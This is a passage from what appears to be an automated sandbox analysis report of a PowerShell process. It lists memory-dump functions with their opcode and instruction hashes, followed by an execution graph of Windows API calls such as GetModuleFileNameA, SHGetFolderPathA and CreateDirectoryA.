                                                                                                                                        • Opcode Fuzzy Hash: c9b7f3f6e848d7a0fbd8a7c366c5a728b11c98950749ef83af3fac73228207fc
                                                                                                                                        • Instruction Fuzzy Hash: 9E113774A00614CFCB28CF59D484A5ABBF1EF49310F1585AAD9868BB61D730ED45CB51
                                                                                                                                        Function 088283FE Relevance: .1, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3e3c52449ce955ecb33ee60b7e40437fc64d10a9d60648a9b64769a0d41582eb
                                                                                                                                        • Instruction ID: 4a444b9837f246a2c5c3e5371c670f7e26c1a5f672f5152e583221f709e35b03
                                                                                                                                        • Opcode Fuzzy Hash: 3e3c52449ce955ecb33ee60b7e40437fc64d10a9d60648a9b64769a0d41582eb
                                                                                                                                        • Instruction Fuzzy Hash: F801D6397086208FDB1A77B8B45416E77E2EBC5712B18446ED50BD7B82CF284C01CB96
                                                                                                                                        Function 088256C1 Relevance: .1, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 68aac50db5ab6a65c29b94ec88051a312a22422073adfaa83ee85536908e3b03
                                                                                                                                        • Instruction ID: f39af1b3ddd1081009ad55e57bb8f2009aea70bb81a54b6433b53b18e940ea8a
                                                                                                                                        • Opcode Fuzzy Hash: 68aac50db5ab6a65c29b94ec88051a312a22422073adfaa83ee85536908e3b03
                                                                                                                                        • Instruction Fuzzy Hash: 78111979644B54CFC765CF29C49090ABBF2BF882113188A5DD9CACBB26DA30F8498B51
                                                                                                                                        Function 04A17518 Relevance: .1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a75b6a55dafbfff6396866c9a57becbfbebcc124ecd3656c23f4d7fd93b63152
                                                                                                                                        • Instruction ID: ac7cecb36c2ada637b8668c8daf4ea20aa9c8ed3d6fd348049871d38520e0066
                                                                                                                                        • Opcode Fuzzy Hash: a75b6a55dafbfff6396866c9a57becbfbebcc124ecd3656c23f4d7fd93b63152
                                                                                                                                        • Instruction Fuzzy Hash: 0111A4B8A00219DFCB04DF99D5809AEFBB5FF89310B1585A9E909AB351C731FD41CBA1
                                                                                                                                        Function 08827E6E Relevance: .0, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9cec33c5fe766e1aac42924653d7a17dd728434f3030e07245dbab7cc391f2ee
                                                                                                                                        • Instruction ID: 5d56c3bb267aa6b3ae49c867b06c3e9038b0021cc1511eea576c83e700792d4c
                                                                                                                                        • Opcode Fuzzy Hash: 9cec33c5fe766e1aac42924653d7a17dd728434f3030e07245dbab7cc391f2ee
                                                                                                                                        • Instruction Fuzzy Hash: 3C111F74900259EFDB05DFA8D884E9DBBB2BF88314F248159E404AB361C775ED81CB60
                                                                                                                                        Function 0303D006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2407901258.000000000303D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0303D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_303d000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 767d8d107d526d8d6dacf923f79dcdf18cf36d2b3f63a604f325aedd16029463
                                                                                                                                        • Instruction ID: 24ef1e7c4dc0cda9fda3e3671ee3554d754c2d82336703db6e8f4dcf1b0d6bc2
                                                                                                                                        • Opcode Fuzzy Hash: 767d8d107d526d8d6dacf923f79dcdf18cf36d2b3f63a604f325aedd16029463
                                                                                                                                        • Instruction Fuzzy Hash: 4C016D7240E3809FD7128B25CC84792BFA8EF43624F0980CBD9848F197D2685845C772
                                                                                                                                        Function 0303D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2407901258.000000000303D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0303D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_303d000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d9f904546627dce0ceabe54e87838a867e6e5f293091f477441e75d8ab49827c
                                                                                                                                        • Instruction ID: 8b5c6fca1645d0f26a95f27cfcc38467997fad7e00c8ee2987e063ac9b8cebb5
                                                                                                                                        • Opcode Fuzzy Hash: d9f904546627dce0ceabe54e87838a867e6e5f293091f477441e75d8ab49827c
                                                                                                                                        • Instruction Fuzzy Hash: 5D01F2724063409AE7108E25CD80BA6FFDCDF82B64F0CC45AEE484A242C6B89941CAB1
                                                                                                                                        Function 08824170 Relevance: .0, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c77c0fabe334b7337d6fdbb2eec7849cb91cd5e3a8fa70c0870cd19220d51dfa
                                                                                                                                        • Instruction ID: 62233623f47945988518b0ce4349d671b959eded4219fa439a2e24377afc3e50
                                                                                                                                        • Opcode Fuzzy Hash: c77c0fabe334b7337d6fdbb2eec7849cb91cd5e3a8fa70c0870cd19220d51dfa
                                                                                                                                        • Instruction Fuzzy Hash: 1BF028766097A09FC322CA3D9C40C577FEDAE9625030A41B9E504CB722D220DC48C3B4
                                                                                                                                        Function 07683A65 Relevance: .0, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1940f110246831a551af7e8f055852fedea853bca65c16ba59e4425df3a343e0
                                                                                                                                        • Instruction ID: 5080f0c63cdb3a65765531f651932bbbb234f02dd255fce71402b6f9db1275ee
                                                                                                                                        • Opcode Fuzzy Hash: 1940f110246831a551af7e8f055852fedea853bca65c16ba59e4425df3a343e0
                                                                                                                                        • Instruction Fuzzy Hash: A4F0A4711087915FC6226BBD6C251DA7F65DE83570315079AE1918FFD2C516980583E2
                                                                                                                                        Function 04A16CDA Relevance: .0, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92becbb705eb23cc8e1f3586618234c12d55f7471c962768ae38c0db6453faec
                                                                                                                                        • Instruction ID: 92fc5684837ea6368ca39d78e3821e52ed376a835c0818627e7942ae3b820e43
                                                                                                                                        • Opcode Fuzzy Hash: 92becbb705eb23cc8e1f3586618234c12d55f7471c962768ae38c0db6453faec
                                                                                                                                        • Instruction Fuzzy Hash: 22014B74A0424A8FC740DF68D485A9ABFF0BF49214F600199D909DB362E731A995CFD0
                                                                                                                                        Function 08829F50 Relevance: .0, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 67920913845f2b80b06e1ec068d2c9c2f97fcf5140705e5680283200e8a74d92
                                                                                                                                        • Instruction ID: bd79a114fbcb1c4ff21166e9f3563f3ee25d92d271c8f22192e97e9efc20ad13
                                                                                                                                        • Opcode Fuzzy Hash: 67920913845f2b80b06e1ec068d2c9c2f97fcf5140705e5680283200e8a74d92
                                                                                                                                        • Instruction Fuzzy Hash: 71F027B494E3A9CFCB088B64A8159FD7FA0EF42106F04409FD50AC7A02C53B54898B52
                                                                                                                                        Function 08828399 Relevance: .0, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e586d23c74f5c67feb9ba8d5de07868a594c99920e08982972385b6d5e11e850
                                                                                                                                        • Instruction ID: 96e91635c1598aa4bc21411ff656d8181747fe0f98a7a90e2a75b34ba19c1a56
                                                                                                                                        • Opcode Fuzzy Hash: e586d23c74f5c67feb9ba8d5de07868a594c99920e08982972385b6d5e11e850
                                                                                                                                        • Instruction Fuzzy Hash: BCF01D36D10559DFCB04DF98D850CEDBB76FF95310F554159E94437220EB30AA8ACBA0
                                                                                                                                        Function 08828750 Relevance: .0, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fb2a68b5b90796db784ab09f6d0cb416dfe32411d7009e8e3b02f7be37ec58a2
                                                                                                                                        • Instruction ID: a959338b35def924d00b2f9fa688865e90da729e694611bd959b9ffba1d0f145
                                                                                                                                        • Opcode Fuzzy Hash: fb2a68b5b90796db784ab09f6d0cb416dfe32411d7009e8e3b02f7be37ec58a2
                                                                                                                                        • Instruction Fuzzy Hash: FFE0D83165A1909FD7128639E88C88ABF74EE8721531945FFE185DB163D6A09848C791
                                                                                                                                        Function 04A16CE8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4cf67596864f71ad1de0f485c7e9b94840a3a3f590289629e4153a9c6edcc088
                                                                                                                                        • Instruction ID: 270e6d64c87fabacf2bfa91e49a014ca950df01852f675212fc44a07216cde85
                                                                                                                                        • Opcode Fuzzy Hash: 4cf67596864f71ad1de0f485c7e9b94840a3a3f590289629e4153a9c6edcc088
                                                                                                                                        • Instruction Fuzzy Hash: F3F09774E0020A8FC780DF68C485AAEBBF0BF49210F5051A9E509EB321E630A945CB91
                                                                                                                                        Function 08829F80 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: efa0c5cb6727c5a0c2d1b80a1e5386043b72953bf683b0bcbc18078da8f69599
                                                                                                                                        • Instruction ID: d154d11f2ce623361f2e100ea06d73b07b36488bc377ea247dbf9d32deb254b7
                                                                                                                                        • Opcode Fuzzy Hash: efa0c5cb6727c5a0c2d1b80a1e5386043b72953bf683b0bcbc18078da8f69599
                                                                                                                                        • Instruction Fuzzy Hash: 6FF05E75D0439A8FCB58DFBD94055AEBFF0AF45224F1082AED868DB382E6354581CF91
                                                                                                                                        Function 08828468 Relevance: .0, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cdbb25112afac78a15fd7cff45b553c828c55b2e754832b2766cbe768324551e
                                                                                                                                        • Instruction ID: aed5dd6f077b6a36a8b3188df3095d9bd5e8ac66e94db361d4b92578c9394540
                                                                                                                                        • Opcode Fuzzy Hash: cdbb25112afac78a15fd7cff45b553c828c55b2e754832b2766cbe768324551e
                                                                                                                                        • Instruction Fuzzy Hash: 22E01A35348034CFCA046BA9B8584AEB7A9EB88726704406BE90EC3B42CF6598419A86
                                                                                                                                        Function 07683A80 Relevance: .0, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ce2314421192335da1f2f84b35d0bb8184efa96ec62ad649548571f49acdf1d9
                                                                                                                                        • Instruction ID: cea38471449bb4d6a95d2f53eb1fa49887b38f1b8dc16ce1b932b5172395bf43
                                                                                                                                        • Opcode Fuzzy Hash: ce2314421192335da1f2f84b35d0bb8184efa96ec62ad649548571f49acdf1d9
                                                                                                                                        • Instruction Fuzzy Hash: 81E09270204B159BCA307FAD980818F7E59AFC26B4710172CE2624FBD0CB66A80187E1
                                                                                                                                        Function 08828581 Relevance: .0, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2d0ec2398b1c2f48b9121a6432c5c689c1ed3e5432257c93c3b6b781fc280d47
                                                                                                                                        • Instruction ID: ec1cb9e703671f282998e405d09e249f573ef9206512dc7d32a8d91e18b0c02f
                                                                                                                                        • Opcode Fuzzy Hash: 2d0ec2398b1c2f48b9121a6432c5c689c1ed3e5432257c93c3b6b781fc280d47
                                                                                                                                        • Instruction Fuzzy Hash: E1E0D86241A2D9ADCB129BB888055D97FA48A12202B0C41FFDD40C7503E4344694A763
                                                                                                                                        Function 08823780 Relevance: .0, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ba8fa51401e0db0a2fc3fce13fc81b3010981e43c1265ce03de9debdc0fc5d90
                                                                                                                                        • Instruction ID: 755323a9b627356e487fe0c3dad216fe6660561a46300c3c684296d533415afb
                                                                                                                                        • Opcode Fuzzy Hash: ba8fa51401e0db0a2fc3fce13fc81b3010981e43c1265ce03de9debdc0fc5d90
                                                                                                                                        • Instruction Fuzzy Hash: 40E04F762041A1BB8B116A1C98148BF7BAED7C9622318822EF429C3751CB3188519BA0
                                                                                                                                        Function 08829F90 Relevance: .0, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 795da2dbf2b503a71a57b46f3539fab4a57e1979bd26f106a1d1e7bb989d83f7
                                                                                                                                        • Instruction ID: 08d0e8a6e9659f93a14b20bec3650b411aa2a0724c446b730c49792ee655f603
                                                                                                                                        • Opcode Fuzzy Hash: 795da2dbf2b503a71a57b46f3539fab4a57e1979bd26f106a1d1e7bb989d83f7
                                                                                                                                        • Instruction Fuzzy Hash: 98E0B6B4D0424EDF8F88DFB994411BEFBF4AB08200F00856ED829E3300E6394A018F95
                                                                                                                                        Function 0882836B Relevance: .0, Instructions: 11COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7edd335a72525ae78122ee6e196a29706f6dfc3ff56d64441dfc0dff4836d04b
                                                                                                                                        • Instruction ID: 0d36db0940b4e46199e08d94bc6bfc06840d3b7ec6236741576eb137656d5ff9
                                                                                                                                        • Opcode Fuzzy Hash: 7edd335a72525ae78122ee6e196a29706f6dfc3ff56d64441dfc0dff4836d04b
                                                                                                                                        • Instruction Fuzzy Hash: D5D09E7044111BDBDF10DF80C61D7AE7B70BB04305F240429D001F5181D7791A94CB91

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 08824C70 Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: qj^$qj^$qj^$qj^$qj^$qj^
                                                                                                                                        • API String ID: 0-2867517424
                                                                                                                                        • Opcode ID: 0418faecb70ef643304fdf29ccf3fb4bba7ca24724d92e303561e9009b68737d
                                                                                                                                        • Instruction ID: 215087bd831aa21dab2b7de9056c8f72ef2b4625b8805bdca89b257ec60606d7
                                                                                                                                        • Opcode Fuzzy Hash: 0418faecb70ef643304fdf29ccf3fb4bba7ca24724d92e303561e9009b68737d
                                                                                                                                        • Instruction Fuzzy Hash: AC31CE0648F3D19FC307433998A80A47FB2AE631A874E51EBC1C4DF4A3E969184BC367

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.4%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:5.6%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:101
                                                                                                                                        execution_graph 100572 11025b00 100573 1110c760 100572->100573 100574 1110c781 100573->100574 100575 1110c76c 100573->100575 100576 1110c794 100573->100576 100581 1110c6b0 100574->100581 100575->100576 100578 1110c6b0 7 API calls 100575->100578 100580 1110c775 100578->100580 100579 1110c788 100582 1110c6f4 EnterCriticalSection 100581->100582 100583 1110c6df InitializeCriticalSection 100581->100583 100586 1110c715 100582->100586 100583->100582 100584 1110c743 LeaveCriticalSection 100584->100579 100586->100584 100587 1110c650 100586->100587 100588 1110c667 EnterCriticalSection 100587->100588 100589 1110c65e GetCurrentThreadId 100587->100589 100590 1110c67e 100588->100590 100589->100588 100591 1110c685 LeaveCriticalSection 100590->100591 100592 1110c698 LeaveCriticalSection 100590->100592 100591->100586 100592->100586 100593 11141510 100599 11141523 std::ios_base::_Tidy 100593->100599 100596 1114158a std::ios_base::_Tidy 100597 11141545 GetLastError 100598 11141550 Sleep 100597->100598 100597->100599 100600 1116076b std::locale::_Init 139 API calls 100598->100600 100599->100596 100599->100597 100602 11141430 ExpandEnvironmentStringsA 100599->100602 100615 1116076b 100599->100615 100601 11141562 100600->100601 100601->100596 100601->100599 100603 11141467 100602->100603 100604 11141474 100603->100604 100605 11141484 std::locale::_Init 100603->100605 100606 1114149e 100603->100606 100618 1113e8f0 100604->100618 100609 11141495 GetModuleFileNameA 100605->100609 100635 11141240 100606->100635 100610 111414a4 100609->100610 100659 11080be0 100610->100659 100611 111414f8 100627 1115e4d1 100611->100627 100614 11141506 100614->100599 100962 111606af 100615->100962 100617 1116077d 100617->100599 100619 1113e8fa 100618->100619 100620 1113e8fc 100618->100620 100619->100611 100663 1110c4a0 100620->100663 100622 1113e922 100623 1113e92b _strncpy 100622->100623 100624 1113e949 100622->100624 100623->100611 100669 110290f0 261 API calls 2 library calls 100624->100669 100628 1115e4d9 100627->100628 100629 1115e4db IsDebuggerPresent 100627->100629 100628->100614 100671 11173e07 100629->100671 100632 11168469 SetUnhandledExceptionFilter UnhandledExceptionFilter 100633 1116848e GetCurrentProcess TerminateProcess 100632->100633 100634 11168486 __call_reportfault 100632->100634 100633->100614 100634->100633 100636 11141262 100635->100636 100640 11141279 std::locale::_Init 100635->100640 100693 110290f0 261 API calls 2 library calls 100636->100693 100639 11141407 100641 1115e4d1 __setlocale_nolock 5 API calls 100639->100641 100640->100639 100642 111412ac GetModuleFileNameA 100640->100642 100643 11141423 100641->100643 100644 11080be0 std::locale::_Init IsDBCSLeadByte 100642->100644 100643->100610 100645 111412c1 100644->100645 100646 111412d1 SHGetFolderPathA 100645->100646 100658 111413b8 100645->100658 100647 111412fe 100646->100647 100648 1114131d SHGetFolderPathA 100646->100648 100647->100648 100651 11141304 100647->100651 100652 11141352 std::locale::_Init 100648->100652 100649 1113e8f0 std::locale::_Init 258 API calls 100649->100639 100694 110290f0 261 API calls 2 library calls 100651->100694 100672 1102a250 100652->100672 100658->100649 100660 11080bf3 _strrchr 100659->100660 100662 11080c0a std::locale::_Init 100660->100662 100961 11080a30 IsDBCSLeadByte 100660->100961 100662->100604 100664 1110c4ae 100663->100664 100665 1110c4b7 100664->100665 100666 1110c4ce _memset 100664->100666 100670 110290f0 261 API calls 2 library calls 100665->100670 100666->100622 100671->100632 100695 11028290 100672->100695 100674 1102a25e 100675 11140ce0 100674->100675 100676 11140d6a 100675->100676 100677 11140ceb 100675->100677 100676->100658 100677->100676 100678 11140cfb GetFileAttributesA 100677->100678 100679 11140d15 100678->100679 100680 11140d07 100678->100680 100934 11161dd7 100679->100934 100680->100658 100683 11080be0 std::locale::_Init IsDBCSLeadByte 100685 11140d26 100683->100685 100684 11140d43 100684->100658 100685->100684 100686 11140ce0 std::locale::_Init 35 API calls 100685->100686 100687 11140d36 100686->100687 100688 11140d4c 100687->100688 100689 11140d3e 100687->100689 100691 1115f3b5 _free 23 API calls 100688->100691 100690 1115f3b5 _free 23 API calls 100689->100690 100690->100684 100692 11140d51 CreateDirectoryA 100691->100692 100692->100684 100696 110282b3 100695->100696 100713 110288fb 100695->100713 100697 11028370 GetModuleFileNameA 100696->100697 100706 110282e8 100696->100706 100698 11028391 _strrchr 100697->100698 100705 1116076b std::locale::_Init 139 API calls 100698->100705 100699 11028997 100702 1115e4d1 __setlocale_nolock 5 API calls 100699->100702 100700 110289aa 100701 1115e4d1 __setlocale_nolock 5 API calls 100700->100701 100704 110289bb 100701->100704 100703 110289a6 100702->100703 100703->100674 100704->100674 100707 1102836b 100705->100707 100708 1116076b std::locale::_Init 139 API calls 100706->100708 100707->100713 100722 11026500 49 API calls 2 library calls 100707->100722 100708->100707 100710 110283e4 100718 11028865 100710->100718 100723 1115f5b7 100710->100723 100713->100699 100713->100700 100714 110283f5 std::locale::_Init 100714->100718 100727 11026500 49 API calls 2 library calls 100714->100727 100716 11028430 std::locale::_Init 100716->100718 100728 11026500 49 API calls 2 library calls 100716->100728 100730 11160535 100718->100730 100720 11028453 std::locale::_Init 100720->100718 100721 11160e4e 81 API calls _LangCountryEnumProc@4 100720->100721 100729 11026500 49 API calls 2 library calls 100720->100729 100721->100720 100722->100710 100724 1115f5a1 100723->100724 100743 1115fe1b 100724->100743 100727->100716 100728->100720 100729->100720 100731 11160541 _fputs 100730->100731 100732 11160553 100731->100732 100733 11160568 100731->100733 100828 11165abf 23 API calls __getptd_noexit 100732->100828 100741 11160563 _fputs 100733->100741 100808 11167769 100733->100808 100736 11160558 100829 1116a6d4 11 API calls _fputs 100736->100829 100737 11160581 100812 111604c8 100737->100812 100741->100713 100744 1115fe34 100743->100744 100747 1115fbf0 100744->100747 100759 1115fb69 100747->100759 100749 1115fc14 100767 11165abf 23 API calls __getptd_noexit 100749->100767 100752 1115fc19 100768 1116a6d4 11 API calls _fputs 100752->100768 100754 1115fc4a 100757 1115fc91 100754->100757 100769 1116d3d5 75 API calls 3 library calls 100754->100769 100758 1115f5b2 100757->100758 100770 11165abf 23 API calls __getptd_noexit 100757->100770 100758->100714 100760 1115fb7c 100759->100760 100766 1115fbc9 100759->100766 100771 11167f85 100760->100771 100763 1115fba9 100763->100766 100789 1116cf14 64 API calls 5 library calls 100763->100789 100766->100749 100766->100754 100767->100752 100768->100758 100769->100754 100770->100758 100790 11167f0c GetLastError 100771->100790 100773 11167f8d 100774 1115fb81 100773->100774 100804 11169f7a 62 API calls 3 library calls 100773->100804 100774->100763 100776 1116cc78 100774->100776 100777 1116cc84 _fputs 100776->100777 100778 11167f85 __getptd 62 API calls 100777->100778 100779 1116cc89 100778->100779 100780 1116ccb7 100779->100780 100781 1116cc9b 100779->100781 100806 1116cc2b 31 API calls 3 library calls 100780->100806 100782 11167f85 __getptd 62 API calls 100781->100782 100784 1116cca0 100782->100784 100787 1116ccae _fputs 100784->100787 100805 11169f7a 62 API calls 3 library calls 100784->100805 100785 1116ccd2 100807 1116cce5 LeaveCriticalSection _doexit 100785->100807 100787->100763 100789->100766 100791 11167dca ___set_flsgetvalue TlsGetValue DecodePointer TlsSetValue 100790->100791 100792 11167f23 100791->100792 100793 11167f79 